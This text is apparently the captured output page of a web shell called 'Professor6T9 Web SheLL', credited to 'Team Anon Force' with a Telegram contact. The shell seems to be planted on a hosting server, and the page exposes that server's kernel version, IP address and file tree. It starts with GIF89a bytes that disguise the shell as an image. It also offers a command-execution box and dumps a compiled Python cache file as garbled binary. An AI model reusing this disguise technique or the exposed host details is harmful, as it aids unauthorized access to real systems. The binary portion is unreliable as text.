GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
__pycache__
[ HOME ]
Exec
Submit
cache.cpython-311.pyc
� L�ii( � �n � d Z ddlmZ ddlZddlZddlZddlZddlmZ ddl m Z ddlmZm Z mZ ddlmZ ddlmZ dd lmZ dd lmZ ddlmZ ddlmZmZ dd lmZ ej e� � Z dZ!dd�Z" G d� d� � Z# G d� de#� � Z$ G d� de$� � Z% G d� d� � Z& G d� de#� � Z'dS )zCache Management� )�annotationsN)�Path)�Any)�Tag�interpreter_name�interpreter_version)�canonicalize_name)�InvalidWheelFilename)� DirectUrl)�Link)�Wheel)� TempDirectory� tempdir_kinds)�path_to_urlzorigin.json�d�dict[str, str]�return�strc � � t j | ddd�� � }t j |� d� � � � � � � S )z'Return a stable sha224 of a dictionary.T)�,�:)� sort_keys� separators�ensure_ascii�ascii)�json�dumps�hashlib�sha224�encode� hexdigest)r �ss �s/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/cache.py� _hash_dictr$ sB � �� �1���$�O�O�O�A��>�!�(�(�7�+�+�,�,�6�6�8�8�8� c �D � � e Zd ZdZd� fd�Zdd �Zdd �Zdd�Zdd�Z� xZ S )�CachezuAn abstract class - provides cache directories for data from links :param cache_dir: The root of the cache. � cache_dirr r �Nonec � �� t � � � � � |r!t j � |� � sJ �|pd | _ d S �N)�super�__init__�os�path�isabsr( ��selfr( � __class__s �r# r- zCache.__init__'